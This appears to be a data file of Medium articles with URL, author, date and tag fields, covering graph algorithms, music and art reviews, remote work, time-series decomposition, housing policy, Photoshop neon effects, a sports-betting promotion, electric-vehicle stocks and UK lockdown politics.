For each test, case output will be V*V space-separated integers where the i-jth integer denotes the shortest distance of the ith vertex from the jth vertex. For INT_MAX integers output INF.
This problem has been previously asked in Samsung.
The Floyd Warshall algorithm, also known as All Pair Shortest Path Algorithm, finds for all the vertices, the minimum cost of going from any one vertex to any other vertex. We do this by checking if there is a path via a particular vertex between two vertices, such that the cost of going via that path is smaller than the current cost of going from one vertex to another.
For example -
Suppose there are two vertices A and C, and the cost of going from one vertex to another is 10. Now let there is another vertex B, such that the cost of going from A to B is 2 and from B to C is 3. So the net cost of going from A to C, via B equals 5, which is smaller, so we update the current cost for A to B, to 5.
Formula for Floyd Warshall Algorithm — if M[a][c] > (M[a][b] + M[b][c]) then M[a][c] = M[a][b] + M[b][c].
The Time Complexity of Floyd Warshall Algorithm is O(n³).
A point to note here is, Floyd Warshall Algorithm does not work for graphs in which there is a negative cycle. In this case, we can use the Bellman-Ford Algorithm, to solve our problem.
The below-given solution is in C programming language.
|
https://medium.com/@srajaninnov/the-floyd-warshall-algorithm-b1ef91395115
|
['Srajan Gupta']
|
2020-07-01 09:05:35.729000+00:00
|
['Dynamic Programming', 'Graphs', 'Samsung', 'Adjacency Matrix', 'Floyd Warshall']
|
Folklore- Taylor Swift Album Review
|
Folklore- Taylor Swift Album Review
The pop superstar pivots once more to the most quiet and intimate release of her long career, for what is ultimately a mixed bag.
In 2020, the concert halls, clubs, and stadiums that are usually filled with screaming fans and touring artists sit empty, collecting dust. But the pause on tradition hasn’t stopped some of the biggest artists in music from releasing original material. Now it seems that the isolation of our new abnormal has inspired the biggest pop star on the planet to pivot entirely once again, in a poetic reversal, from pop star to indie singer-songwriter. Folklore marks Taylor Swift’s eighth studio album to date and and an all new direction for her as an artist. The understated rollout fits nicely beside her quietest and most intimate musical release in years, maybe ever.
The title, folklore, and the coppiced album cover had me excited to hear what looked to be a true blue indie record. For the most part that is exactly what Taylor has delivered on folklore, and I do feel that her change in artistic direction is for the best. I have always held the opinion that while she is a gifted songwriter, her pop sensibilities don’t measure up to her contemporaries. Even the best T-Swift pop record can’t compete with the likes of Carly Rae Jepsen, Charli XCX, or a whole crop of newcomers like Rina Sawayama or Dua Lipa. So now having departed from her traditional sound once more I do think I can say that folklore, while not without its faults, is Taylor Swift’s best album in years.
The album starts off very solidly with “the 1” and into the lone single for this album “cardigan,” a song that gives off strong Lana Del Ray vibes but is still a great track nonetheless. Taylor makes it clear right from the opening notes “the 1” what this album is going to sound like. The song that follows, “the last great american dynasty” is without a doubt my least favorite of the entire album, but it is an oddity in the first half of folklore. On “dynasty” Taylor’s love for fictional poetry becomes too impersonal for its own good, to the point that I’m disinterested in the story. From this point on though the album is focused and tight, delivering the best stretch of songs in the whole tracklist. “Exile” with Bon Iver aka Justin Vernon sees the indie legend switching lanes himself into his richer, deeper delivery that we rarely get to see. It’s nice to hear Vernon in this style and the two show impressive chemistry towards the back end of the song. Track five on every Taylor Swift album is traditionally saved for the saddest or heaviest song of the bunch. So on an album like folklore its no surprise that “my tears ricochet” packs a particularly powerful punch. Several more solid songs follow, “mirrorball,” “seven,” and “august,” but after those the cracks begin to show.
What once was fresh on the first half of folklore becomes tired and repetitive on the second half. The instrumentals all follow very similar progressions and while the lyricism is still solid there are no great or sticky melodies that carry with the listener. If you asked me to right now, I don’t think I could sing back even one melody from this entire album that I have listened to five times. The closest we get to a catchy melody is the chorus of “cardigan,” or parts of “invisible string.” It is worth saying that you don’t have to have catchy songs for an album to be good, some of my favorite music especially in the indie scene is devoid of traditional melodies. But Taylor’s lyrics and vocals, while not bad, are not mind-blowing enough to carry the more lackluster parts of the album.
Many have pointed out the obvious issue with the production on folklore is the way Taylor’s vocals are mixed on nearly every song here. They erupt off the track, often dominating the instruemtnal entirely. It is the way vocals should be mixed on a pop record, not on an indie singer-songwriter album. A more hushed vocal style or different production choice would have done many of these tracks a favor.
Across the music community a comparison that many, including myself, have drawn to folklore is Phoebe Bridger’s newest album Punisher. A comparison that is quite honestly unfair to Phoebe Bridgers. If anything Punisher is what Taylor’s album should sound like not what it does sound like. Punisher is varied instrumentally and lyrically with several ear grabbing moments and a cathartic closing track. While Folklore is more like wallpaper indie music with much simpler instrumentals and vocal performances.
In general on this album the songs are well made in a simple but effective style. There are no instrumentals or vocal deliveries that immediately jump out at you, and this allows Taylor’s lyrics to assume center stage, lyrics that are some of her best in nearly a decade. The issue arises when the instrumentals start to become repetitive and the vocal production issues become more obvious.
Folklore represents a seismic shift not only for Taylor Swift as an artist but for the entire indie genre. Indie folk was once style of music so underground the man who pioneered it died penniless. Now that same genre has been cosigned by the biggest pop star on the planet. So while Taylor Swift’s attempt at this once esoteric genre may not be the best or most inventive, it is for many people, the most accessible.
Rating: 6.5/10
|
https://henrydlong.medium.com/folklore-taylor-swift-album-review-a4317271ea91
|
['Henry Long']
|
2020-07-31 03:09:05.032000+00:00
|
['Taylor Swift', 'Music', 'Review', 'Indie', 'Pop Music']
|
How Sophie Tea Art is painting the path to empowerment.
|
Nudes play a significant part of Tea’s branding, and the paintings on her Instagram are based on real nude photographs that women all around the world have submitted to her. The first day that she asked her followers to send nudes, she saw over 1000 photos being sent, and this number will have only increased over the last year as more and more women pluck up the courage to share their intimate photos. The process of submitting a nude to a stranger may at first seem daunting, but the incredible artwork that they are turned into is the perfect opportunity to see the beauty of your body from an artist’s perception. You might take a nude on your phone and have the courage to send it to Tea whilst mistakenly believing that your rolls are unflattering, and then later see your nude painted and realise that rolls are a stunning example of contrasting light and dark, like the first image above. The opportunity to send nudes is open to everyone (over the age of 18, of course), so women all around the world can feel the empowerment that comes with embracing your body in all it’s natural beauty.
Another way that Sophie Tea encourages empowerment through nudity is with her live ‘Send Nudes’ shows, which are known for their jaw-dropping scenes (in many cases, these are probably literal jaws dropping) across London. Women of all ethnicities, ages, sizes, and disabilities strip down and get hand-painted by Tea before showcasing their colourful beauty across the gallery and city. The most recent show took place in October, when Sophie was sadly stuck on the other side of the world in Sydney due to Covid lockdowns. Her team took the lead to manage this amazing feat, with bold strokes of every colour under the sun layered across the volunteers- who are known affectionately as ‘nudies’. The nudies then strutted their stuff all over the city, as a “huge f*ck you to unrealistic female body standards” as they donned only a pair of trainers and a Covid-compliant face mask in Tea’s signature shade of pink. Photos and videos taken by the public, who happened to be in the right place at the right time, showed a group of courageous, powerful women owning every inch of their body and baring it to the streets of London with pride. The energy from the official posts that Tea shared is off the charts: a blend of excitement, pride, and, most importantly, empowerment at seeing women reflective of every walk of life coming together to unapologetically display the magic of the female body to the general public and Tea’s followers.
In conclusion, Sophie Tea Art represents a brand that is innovative, revolutionary, and empowering, with a focus on ensuring that all women embrace every part of themselves. It’s a message that needs to be yelled from every rooftop in the world: love yourself in all your unique and unapologetic glory.
October’s ‘Send Nudes’ show in London. (Credit: Sophie Tea, Instagram)
|
https://medium.com/@holly-berry24/how-sophie-tea-art-is-painting-the-path-to-empowerment-8938af38d2be
|
['Holly Berry']
|
2020-12-21 19:43:44.416000+00:00
|
['Empowerment', 'Art', 'Feminism', 'Body Image', 'Sophie Tea']
|
The Remote Working Dream Is Dead
|
Look, I’ve come out relatively unscathed.
I’ve managed to catch a few lunch dates, and I’ve certainly lived the majority of the year in my pyjamas. And, I don’t have kids — although I do have a husband and two cats who love to interrupt when I’m on a phone call.
So, how can I complain?
Well, there’s still a few universal annoyances that have likely caught all of us ‘remote working dreamers’ out — no matter what our living situation.
The dreaded Zoom call
There’s no denying that Zoom is a lifesaving invention. In times where we can’t hold in-person meetings but need that extra connection, Zoom fixes that issue right up. We can screen share and see all those lovely, friendly faces and facial expressions — although the majority of the time we’re actually staring at our own face.
But when video calls are ‘popped’ in our schedule when it can be dealt with by way of a one-line email or quick phone call, that’s when the problems kick in. Zoom anxiety and fatigue is a real thing, and it’s become a real negative aspect of working from home.
Boundaries. What boundaries?
Remember when we generally used to work from 9am — 5pm, Monday — Friday? Nope, neither do I. Because all of a sudden, since everyone began working from home — regardless of whether you’re an employee or a freelancer — everyone has forgotten that they have a life outside of work.
When I sign off at the end of my working day (because I’ve actually managed to instil some serious boundaries now) I take a big sigh and smile at my empty inbox that I’ve spent all day clearing. I login at 9am the next morning to what seems like thirty thousand emails across various different email accounts as all of my clients have decided to spend the night before working.
Soul destroyed.
Where’s my pool float?
Instagram, especially right now, promotes lies.
My idea had been to spend parts of the year lying on a pool lounger in a tropical country, sipping cocktails, and tapping away on my laptop. Because that’s what all the digital nomads do, right?
We won’t address whether I could afford to do this or whether this was a realistic image when I first decided to go freelance, but regardless, the vision that was sold to me has not transpired.
|
https://medium.com/@amycubbon/the-remote-working-dream-is-dead-282b445edcf4
|
['Amy Cubbon']
|
2020-12-23 11:06:53.440000+00:00
|
['Freelancing', 'Humor', 'Work', 'Life Lessons', 'Remote Work']
|
The Basics: Time Series and Seasonal Decomposition
|
Data Science from the Ground Up
The Basics: Time Series and Seasonal Decomposition
Handling time stamped data is one of the most intuitively obvious use cases for data science. After all, any data we can collect necessarily must be gathered from or represent the past and we often want to make predictions about unseen cases we’ll encounter in the future, so it makes sense that our models might have an important time component, in some form or other. Time series models are distinct from other sorts of predictive models in that the target variable is both the object of the prediction (for future values) and an input feature of the model (for the historical values).
The first steps in approaching a time series project are frequently to visualize and then decompose the data into trend and cyclical components. From there, you can start to work on more complicated predictive models, though simply decomposing the series can itself yield some valuable insights. This article will focus on the simplest decomposition technique, classical seasonal decomposition, but even this can be quite useful.
When are time series techniques appropriate?
Nowadays, most data, particularly procedurally generated data, comes with a timestamp. Whenever a digital form is filled out and submitted, or whenever a purchase is made online, the exact time is typically recorded and stored. As a result, many datasets come with a time element of some nature, but that doesn’t mean that the time series techniques discussed here are necessarily appropriate. These techniques only really make sense when there is some degree of auto-correlation in the target variable, that is, when the target variable is correlated with itself from earlier periods. If a value from yesterday or last month, or last year can help you predict the value for today, then these time series techniques are appropriate. If that isn’t the case, then they won’t help.
Consider, for instance, the day to day movements in stock prices, which are famously random. Knowing that a stock went up yesterday doesn’t really tell you whether the stock is likely to go up today. Here, for example, is a real life example of day to day stock price movements:
The day to day change in a certain stock’s price. Not really appropriate for time series analysis
The company in question is actually Apple, but you wouldn’t be able to tell that just by looking at the day to day movements — like all stocks, Apple’s bounces around from day to day in a way that defies prediction. Time series analysis won’t help.
Now, instead of looking at the day to day movement in price, let’s consider the stock price itself. Unlike the day to day change, the price does exhibit autocorrelation. Yesterday’s stock price gives me a very good indication of what today’s stock price will be because the price typically doesn’t change by more than a percent or two in any given day. If the price was $200 yesterday, I can be pretty sure it’ll close between $190 and $210 today, barring exceptional events. Out of the seeming noise of the day to day movements, the price itself exhibits a trend that suggests time series analysis might be useful:
The actual price of Apple stock. Maybe appropriate for time series analysis?
But then, stock prices are still stochastic in nature and while there might be some benefit in smoothing out a graph like this depending on what sort of analysis you’re doing, you’re going to have a hard time actually predicting future values. So, let’s consider one final Apple related series, the number of iPhones sold globally each quarter:
Number of iPhones sold each quarter. Definitely appropriate for time series analysis
Now, this is a time series we can work with! Notice that it doesn’t just exhibit a general trend, but also has predictable cycles within the trend — you’ll see a spike in sales each year corresponding with Apple’s first quarter (their accounting year starts in October, so their first quarter is picking up holiday sales). The goal of our time series techniques is often to find and exploit predictable patterns like this, even when the patterns are subtler and harder to spot than the seasonal pattern in iPhone sales.
Rolling averages and trends in time series
A common first step when approaching a new time series project is to smooth out the data with something like a rolling average. This has two main benefits. One is that real world data tends to jump around a bit, even if there is a clear underlying trend, and looking at the rolling average makes it easier to tell how the trend is moving underneath the noise. Second, finding a trend in this or a similar manner is the first step towards creating a seasonal decomposition. Let’s look at a real example. Here is a common starter time series data set, which shows the number of airline passengers there were per month in the US in the fifties:
Air travel boomed in the 1950's
There’s obviously an upward slope as air travel went from a relatively rare luxury in the late 40s to a much more common experience in the 60s, but there’s also clearly a seasonal pattern with travel being consistently higher in some months rather than others. The month to month variation makes it hard to see exactly how fast this growth is. We can smooth out the monthly fluctuations by considering a rolling average, where a few consecutive months are considered together. A particularly high or low value in one month will, therefore, be tempered by the less extreme values in the other months in the rolling window. Consider the original data alongside a six month rolling average:
Our data with a 6 month rolling average
The rolling average doesn’t get as high as the original data at its peaks, or as low during the troughs. One thing you may notice about this particular example is that it also doesn’t seem to hit the peaks and troughs at exactly the same time as the original data. This rolling average is more specifically a trailing average: the six months that make up the average for a given month are that month’s point and the five preceding months. As an alternative, you might consider centering your window on the month. You could, for instance, consider the month itself, the two previous months and the two subsequent months for a 5 month window (this tends to work better with odd numbers of months), but one that coincided with the peaks and troughs of the data rather than lagging them by a month or so:
Comparing rolling windows of equal length but different centers
You might be able to see already, that this strategy has an issue when you get towards the end of your data set — you can’t consider the average of a future month for which you have no data yet! In the above example, the centered rolling average simply stops two months before the end of the dataset while the trailing average goes all the way to the edge. There are some ways to deal with this — perhaps as you get towards the end and start running out of future months, you start to consider fewer months to close the gap — but these may not be satisfactory. (Of course, the trailing average also has a similar problem, but one at the beginning of the series, where you can’t take an average of the last 6 months if you’re only in, say month 2 or 3 of the data set.)
You can also vary the size of the window to adjust how much smoothing you do. As you increase the window, the rolling average will get less and less peaky:
Comparing windows of various size
There are a few other ways of smoothing out time series and finding trend lines, but they tend to be variations on the theme of the simple average. One common one worth mentioning is the Exponentially Weighted Moving Average (EWMA) which, true to its name, averages previous periods, but weights them so that the more recent periods count for more in the average.
Classical Seasonal Decomposition
One use of a creating a smoothed trend line in this fashion is to perform seasonal decomposition, to break out the original data into components for the trend, cyclical deviations from this trend and then whatever residuals are left over. How do we go from a smoothed line to the full decomposition? Well, notice that as you increase the size of the rolling average’s window the impact of the seasonal fluctuations fade away. If your rolling average considers a window that is the same size as your seasonal cycle, it essentially washes out the seasonal cycle altogether by considering one of each month in the cycle:
The 12 month rolling average doesn’t really have ‘seasons’ anymore
We’re looking for a seasonal cycle that accounts for the differences between the original data and this season-less rolling average. There are two ways to try to calculate this seasonal element. The first is as an additive model. In this method, we’ll imagine that the true value for any given month is the value of the trend at that month plus a static seasonal value that changes from month to month within a year but stays roughly the same for the same month in consecutive years, with some (hopefully small) amount of error left over. Let’s start by calculating a ‘de-trended’ series: taking our original series and subtracting the trend from it:
Our de-trended series. Spoiler: the fact that the amplitude of the seasonal pattern grows is a bad sign
This de-trended series shows us just the seasonal cycle along with whatever other noise there is in our data set. Now we can simply consider each month within the cycle one by one. How much above or below the trend is the average January data point? Or the average February? We can simply take a month by month average to get an approximation of the seasonal cycle:
Our seasonal component
Looking at these average seasonal components like this you can see clearly how air travel varied from month to month, with much more travel in the summer months than in the winter. Now we can model our original data as being comprised by the trend and this seasonal component:
Putting together our trend and seasonal component
Our modeled data in the green line isn’t horrible, but it’s clearly got a problem — it consistently overshoots in the early years and consistently undershoots in the later years. Actually, we could have foreseen this problem arising when we graphed out the de-trended data and saw that the seasonal swings got more and more extreme. In this case there is a simple fix, which is to consider the second way of decomposing the time series, the multiplicative model.
The multiplicative model works similarly to the additive one, except in this case we say that the final data for any given month is some value from the trend multiplied by some seasonal adjustment that stays roughly the same year over year. The additive model says something like “the number of flights is typically 40,000 higher than the trend in June”, while the multiplicative model says “the number of flights is typically 10% higher than the trend in June”. In this way, the multiplicative model scales the size of the seasonal cycle as the trend rises or falls.
Calculating the multiplicative seasonal cycle is similar to calculating the additive one, except that to find the de-trended series, we divide the original data by the trend:
The multiplicative de-trended series. Notice it no longer grows in amplitude as time goes on
We can find the monthly adjustments by averaging each month of this de-trended series, and then model out our data as the trend multiplied by the appropriate seasonal adjustment:
Much better!
You might already be able to tell that successfully decomposing a time series set in this fashion depends crucially on properly identifying the period of the seasonal cycle. Is it a yearly cycle? Or does it take two years? Or only 6 months? Often times there are clear calendar cycles — week to week, month to month or year to year — but depending on what sort of data you are working with, there might not be any reason for it to conform to the calendar. Choosing an inappropriately sized period will render your decomposition functionally useless.
As an example, imagine you were looking through a data set like the one we’ve been considering, but you didn’t know what it represented and didn’t assume that it had an even yearly period of 12 months. What happens if you select an 11 month period instead of a 12 month one? Well, at first things seem to be going ok. When you plot out your rolling average, it looks like you’ve more or less removed the seasonality:
An 11 month rolling average seems to work just fine…
When you perform the rest of your steps to decompose the series along the 11-month period, however, you quickly see that something isn’t right:
Well, as model’s go, this isn’t very helpful
This seasonal decomposition is basically useless, adding no real value above the smoothed out trend line. As you can see classical decomposition really depends on finding a sensible value for the period.
Classical decomposition may seem simple, and in a way it is and old-fashioned to boot, having been developed in the 1920s. Yet, hopefully, you can see that simple as it is, it can be fairly powerful, modeling out our data well. It may also be clear how you can extend this sort of technique to start predicting future values as well, drawing out the trend a few extra months and applying the appropriate monthly adjustment.
It’s also worth bearing it in mind for how it captures the time series process in general: try to isolate the trend, look for predictable patterns and account for them. You can then look for explanations for any significant deviations. There are more complicated ways of isolating trends, but they will all, basically by necessity, look at multiple points in time to try and isolate the trend from the day to day, week to week, or month to month variation. There are more advanced methods to look for predictable patterns in the de-trended data, including methods that consider multiple patterns of different periods happening at the same time, but in principle, they also work much the same way.
In my next post on time series, I’ll profile some of these more advanced methods and how they can be extended for predicting future values.
|
https://towardsdatascience.com/the-basics-time-series-and-seasonal-decomposition-b39fef4aa976
|
['Max Miller']
|
2020-03-19 04:15:06.709000+00:00
|
['Seasonal Decomposition', 'Time Series', 'Data Science Ground Up', 'Time Series Analysis', 'Data Science']
|
Public Housing Green New Deal Act Statement
|
Stanley Isaacs Houses
Statement on Rep. Alexandria Ocasio-Cortez and Sen. Bernie Sanders’s Public Housing Green New Deal Act:
To end the housing crisis, it’s crucial that we fully fund and fix our publicly owned homes in a way that empowers residents, upholds strong labor standards, and addresses the challenges of climate disaster head-on. Rep. Alexandria Ocasio-Cortez and Sen. Bernie Sanders’s Public Housing Green New Deal Act would be an important part of making sure that public housing, one of our most threatened sources of deeply and permanently affordable housing, remains livable, safe, and sustainable for years to come.
In New York City and across the country, the condition of our public housing stock, long starved of much needed and deserved federal funding, is dire. Just last week, 5,500 NYCHA residents were left without heat as the boilers failed in 23 buildings across 3 different developments. This is nothing new, as residents, the vast majority of which are people of color, are routinely at risk from mold, lead paint, lack of heat and hot water, and buildings urgently in need of structural repairs. What’s more, a significant portion of NYCHA’s portfolio is located in flood zones and is extremely vulnerable in the event of extreme weather and sea level rise.
The Public Housing Green New Deal Act addresses these problems in a number of innovative ways. Through 7 different federal grant programs, the act would decarbonize the United States’ entire public housing stock, provide funding for renewable community energy production, improve resiliency measures, ensure all tenants have a say in their building and development through the strengthening of resident councils, and provide good paying jobs and economic opportunities for residents. Importantly, this act also repeals the Faircloth Amendment, which currently prohibits the construction of new public housing units, allowing us to build the new non-speculative homes that we need.
Public housing isn’t a failure. Over the past decades, our state and federal governments have systematically disinvested from our public housing authorities while pushing privatization programs like RAD that put residents at risk of rising rents and eviction. Under the Green New Deal, these developments can instead be transitioned into a model for sustainable and equitable housing while centering the needs of residents who have long been ignored.
As this act makes clear, Housing is a human right. No one should have to live in substandard conditions. In Congress, I will be a tireless advocate for homerenters, especially those living in publicly owned homes, as we fight for a Green New Deal for Cities and a Homes Guarantee.
In Solidarity,
Peter Harrison
Democratic candidate for NY-12
www.peterfornewyork.com
|
https://medium.com/@peterfornewyork/public-housing-green-new-deal-act-statement-2add1c18c66d
|
['Peter Harrison']
|
2019-11-14 13:18:21.066000+00:00
|
['Public Housing', 'Alexandria Ocasio Cortez', 'Bernie Sanders', 'Green New Deal', 'Housing']
|
And there was Neon Light!
|
As I ventured on in discovering my own style of photography, I came to realize the limit of my skills and reevaluated myself to get over my shortcomings. One of these shortcoming was my poor use of light sources and general lighting. Photographer Calop had been my teacher in learning new techniques and ideas I were able use in my photos. I learned to use Adobe products such as Photoshop and Illustrator to edit photos and illustrations respectively.
With newfound knowledge, I began to apply photo manipulation to my edits, starting with the addition of artificial lighting. I made neon-like illustrations and added them on top of photos as light sources. Being able to do this type of editing made me realize the importance of post-processing. I was able to apply ideas that I weren’t able to do before. With photo manipulation, I had the power to add light objects to photos and even paint in highlights as well as shadows. One of my early projects involved transforming the times of day; I wanted to utilize the neon illustrations I made so I turned the photos to look like it was shot during the night and added in neon objects for style.
First, transform the photo from day to night.
·Use this tutorial as your guide: https://www.facebook.com/100059001435222/videos/pcb.107474634562584/107324377910943/
How to: Paint Lights
· Add new layer and choose the brush tool.
· Choose color of light. (Use light colors and consider the environment of the image.)
· Paint the spot where the light would be in.
· After brushing, click; filter, then blur, then Gaussian blur. Blur the paint slightly to lessen its sharpness.
· Then duplicate the Layer of the brush twice. (ctrl+J or cmd+J)
· Use a slightly higher value of Gaussian blur on one duplicated layer. High enough to have a glow effect on the surrounding of the brush.
· Then do the same on the other duplicated layer but with a higher value to give highlight to its surroundings.
How to: Add Neon Lights
· Add new layer and design the desired neon light with the brush or shape tool.
· The color should be white (for now), and the lines, thin enough to be distinguished as neon.
· After designing, give a slight amount of blur just like the light paint before.
· Duplicate them as well with the same amount of blur (amount depends on size and personal preference), but now, choose the intended color of the neon light. Change the duplicate layer’s color to the neon’s real color.
Tips for adding neon objects to photos in Photoshop
· Analyze and distinguish possible surfaces of the photo; add highlights and shadows to surfaces that may and may not be hit by the neon object to be added. This can be done using the paint tool and masking.
· Give the neon objects a radiant glow using blur (try Gaussian) and blending it to smooth out the shine; this helps in giving the lights a feeling of realness.
· It is advisable to crop out little details that may have an effect on the intended mood of the photo edit. These may include people in the background and other lights that may distract from the subject. This can be done using various methods such as the paint tool, fills, and smudging.
· Give the eyes the glow it’s supposed to have.
What’s most important in the process of photo-manipulation is the photographer being able to express what he/she wants that can’t evidently be seen through a simple, raw photo. Alongside aesthetics and stories, photographers search for feelings they want to express. I believe that the manipulation of photos allows me to create new expressions I deem personal and worthy of audience appeal. There is no limit to creativity; a good photographer will utilize both ideas and technology to their full potential.
|
https://medium.com/@gawaniemman/and-there-was-neon-light-91271e5bfbbc
|
['Emmanuel Gregorio']
|
2020-12-14 03:11:15.380000+00:00
|
['Photoshop', 'Light', 'Editing', 'Light Painting', 'Photography']
|
Bet $5 Win $150: Browns at Packers
|
Christmas is upon us and FanDuel Sportsbook has an awesome gift for new users. Sign up before or on Christmas day and get 30/1 odds on any team playing on Christmas day to win their game https://bit.ly/Bet5WIN150 One particular matchup where this makes a ton of sense is when the Browns and Packers meet at Lambeau Field.
When the NFL schedule was released, it isn’t outlandish to have assumed these teams would be in each other’s shoes at the moment as Cleveland entered the year with short Super Bowl odds and Aaron Rodgers retirement rumors were still abound. Fast forward to the now with
Cleveland coming off a heartbreaking home loss to the Raiders with Nick Mullens behind center where many other regulars were out due to covid protocols while the Packers withstood a extended their win streak to 3 improving to 11–3 and clinching them the NFC North title.
The Browns have been one of the most inconsistent teams in the NFL this season and after losing to Arizona in week 6, they have since alternated wins and losses in every game. The Packers are as healthy as they’ve been all season and besides some defensive lapses over the last 4 weeks, have been quite possibly the best team in the league. Green Bay has also been really good at home winning all 6 of their games by an average of almost 14 points. With news that Browns center J.C. Tretter goin on Covid list while writing this, the Browns chances of receiving coal on Saturday seem even more likely. Backtracking to the Packers recent defensive struggles, you also see teams with either dynamic skill players or a mobile QB which the Browns possess neither of these traits at this time.
It’s clear who the better team here is and I fully expect the Packers to dominate on Saturday. Although my last big favorite I backed (Tampa Bay -10.5) didn’t work out too well for me, I’m confident that Aaron Rodgers & Co. are fully committed to that #1 seed in the NFC and will not repeat the same mistakes from last week. Give me Packers -7.5 *(as of Noon 12/23)
However, to make your Christmas even better, take advantage of the FD Sportsbook offer I referenced and get 30/1 odds on Green Bay just to win as your first bet. Sign up and make Christmas a winning one by using the link below.
|
https://blog.fantasylifeapp.com/bet-5-win-150-browns-at-packers-f46a437ea5e
|
[]
|
2021-12-23 17:29:26.030000+00:00
|
['Sports Gambling', 'Sports', 'NFL', 'Sports Betting', 'Fanduel Sportsbook']
|
Will Chinese EVs pull a TikTok on Tesla?
|
By now we are all familiar with the growth story of TikTok and how it grew way faster than all western social networks, now Chinese EV stocks have been on a massive bull run and yesterday, possibly the most hyped EV company -NIO- announced their 2020 Q3 results:
Sales increased 147% YoY, margins finally went positive, all that good stuff.
But how does young NIO compare to Tesla’s early days? The deliveries per quarter tells the growth story:
Deliveries Data: Link
After 10 quarters of deliveries, NIO is sitting at a rate of 12.2k deliveries per quarter, this is in contrast to Tesla’s end of first 10 quarters of delivering cars (back in Q4 2014) where they hit a rate of 9.8k deliveries per quarter.
NIO’s deliveries have been growing at an average rate of 40% QoQ, versus Tesla’s deliveries back in the day growing at 20% QoQ. This is despite NIO’s early ramp having to deal with the pandemic and yet still managing to beat young Tesla vis-à-vis.
So who is winning? It’s hard to tell right now. As Tesla has shown us, linear growth and exponential growth look the same in the early days. NIO’s CEO William Li talks about raising production quantities in 2021 to 150k-300k per annum (37.5k-75k per quarter), this would put NIO way ahead of Tesla’s historic ramp up.
The assumption is that the Chinese market is bigger (just based on population), but also easier to build up: Wealth is spread much less evenly in China in contrast to North America or Europe. Most of Chinese EV customers are located in coastal cities, while rural China is poor in comparison. This means that current EVs with not-so-great range present a stronger value proposition, and the reach of the charging network does not have to be as extensive as that of the US.
While NIO gets to lean on the technology and product awareness Tesla developed over the years, they also have to deal with the increased pressure of directly competing with it as well as many other Chinese EVs (Li, XPeng, BYD, et al).
A wave of price cuts for Tesla’s MIC (Made in China) vehicles is on the horizon as they continue to ramp up production. The price cuts could be greater than expected, with rumours of a Lithium Iron Phosphate battery pack in the cards for Tesla. This chemistry was previously written off for its low performance, but the increased efficiencies of powertrains and the pursue for cheaper EVs may have made them viable again. This would be a strong blow to NIO’s momentum, stirring up an intense rivalry.
|
https://medium.com/@getmeflyingcars/will-chinese-evs-pull-a-tiktok-on-tesla-bf0a72777971
|
['Gonzalo Espinoza Graham']
|
2020-11-19 01:48:02.640000+00:00
|
['Tesla', 'Electric Vehicles', 'Tech', 'Electric Car', 'China']
|
British democracy is caving in on itself. Merry Christmas.
|
The British public has not even begun to understand the seriousness of what is happening to our country. This recent warning from Lord Sumption in a law lecture was an alarm for all those interested in preserving our democracy.
As 20 million people are under stay at home orders for Christmas, via another last-minute Ministerial diktat delivered via a press conference, and even the world’s borders are refusing us, alarms must ring louder than ever.
MPs have raised questions about the new coronavirus strain and Christmas restrictions for weeks. Yet barely more than a day after Parliament went on recess, the Prime Minister delivered a decree so ‘inhuman’, to use his own words, he had completely ruled it out in the House of Commons. Now, for millions of us, it is a criminal offence to spend time with our families this Christmas.
This is a heinous way to govern a democratic nation. The Prime Minister’s criminalisation of the most important family celebration of the year, reversing promises he just made in the House of Commons at the drop of a hat, leaves him with barely a shred of democratic legitimacy. This reckless manner of rule-making over the minutiae of our family lives is incompatible with any reasonable notion of a democratic social contract. It is, frankly, more characteristic of social control.
Mr Johnson seems unmoved as he adopts the role of Britain’s most authoritarian Prime Minister in modern history. In fact, he now has form for announcing the most difficult decisions at times that undermine or simply evade parliamentary scrutiny. The first national lockdown law in March was imposed one day after Parliament went on recess. The second national lockdown was announced to the nation, as though it were law, two days before Parliament returned from recess. And now, much of the country has been plunged into a third lockdown, as soon as MPs left for the Christmas recess.
In the wake of the Prime Minister ushering in the most extraordinary infringement on citizens’ right to a private and family life on the brink of Christmas, what can MPs — who were elected to make, amend and scrutinise legislation — actually do? Merely tweet their concerns? Do they share responsibility for the millions of pounds of perishable products squandered in the lorries at Dover? How will they respond to the panicked emails from constituents, many of whom are continuing to work? I hope they get more than an out of office reply. Because liberty, lives and livelihoods are being lost in this democratic void.
Plenty of MPs are calling for Parliament to be recalled, but they have no real power in this regard. Only Ministers can request to the Speaker that parliament returns. Even if Parliament were recalled, London’s Tier 4 restrictions (that MPs have not had a chance to vote on) would cause many to stay at home in their constituencies. The law only permits you to go to work if it is not reasonably possible to work from home. It is possible for MPs to work from home — Members of the House of Lords have been working under remote procedures for months — but the Government will not allow it in the Commons. The Leader of the House, Jacob Rees-Mogg, has maintained tough restrictions on remote participation in legislative votes and debates in the Commons. It is extraordinary that the Chamber should be empty at this moment in our nation’s history.
This year has put the cracks in our parliamentary democracy under uncomfortable pressure. The more Ministers use urgent procedures to make laws without parliament — even laws that suspend the population’s liberties — the more one wonders if the architecture of our democracy is already caving in.
It is not that I believe MPs will launch a democratic rebellion — at least not one that will win. The Opposition is more or less furloughed; their Leader is like a zealous Deputy Manager hoping to get the top job if he tows the Government’s line and promises to “deliver” better. MPs seem to be in the kind of stasis we saw in the lead up to the war against Iraq. Over 400 MPs voted for that illegal war — many gripped by crisis, abdicating analytical and moral responsibility, uncritically “following the intelligence”. Between the media clamour, the international pressure and the intelligence agencies, there was an overwhelming push for war. Here we are again. Merely “following the science”, floating in the tide of a media clamour, international pressure and health authorities.
How many MPs would have been so cynical to believe that the “facts were being fixed around the policy”, as the former head of MI6 said in the run up to the war? And how many MPs today are so cynical to think the “figures are being chosen to support the policy, rather than the policy being based on the figures”, as Theresa May remarkably said in the Commons — or that “overblown rhetoric” was being used, as Chris Whitty himself put it? Belief in authority is so often blind.
We cannot make the mistake of assuming that our democracy will return to perfect form as soon as the stress is released, simply like a mechanical spring. History tells a different story. It is not the case that mass vaccinations will return the country to “normal”. The muscle memory Britain has acquired for lockdowns, shock and awe law-making and rule by decree cannot be entirely unlearned. Despite 2020 being the year of taking back control and “recapturing sovereignty,” as Mr Johnson put it, Parliamentary sovereignty is crumbling with every dreadful diktat he issues from that lectern.
Let us at least, in this swansong of democracy, go through the sombre motions. For the MPs who do understand the seriousness of what is happening to our country, and railed against Government imposing new national restrictions without parliamentary involvement, their red lines have been crossed yet again. If criminalising family gatherings at Christmas in this way does not spark a democratic rebellion in Parliament, I do not know what will. But how would we know? The gift of recalling Parliament is in Government’s hands and it does not seem to be one they will give us this merry “little” Christmas. Surely then, there are no more red lines to cross.
|
https://medium.com/@silkiecarlo/british-democracy-is-caving-in-on-itself-merry-christmas-76a783032d75
|
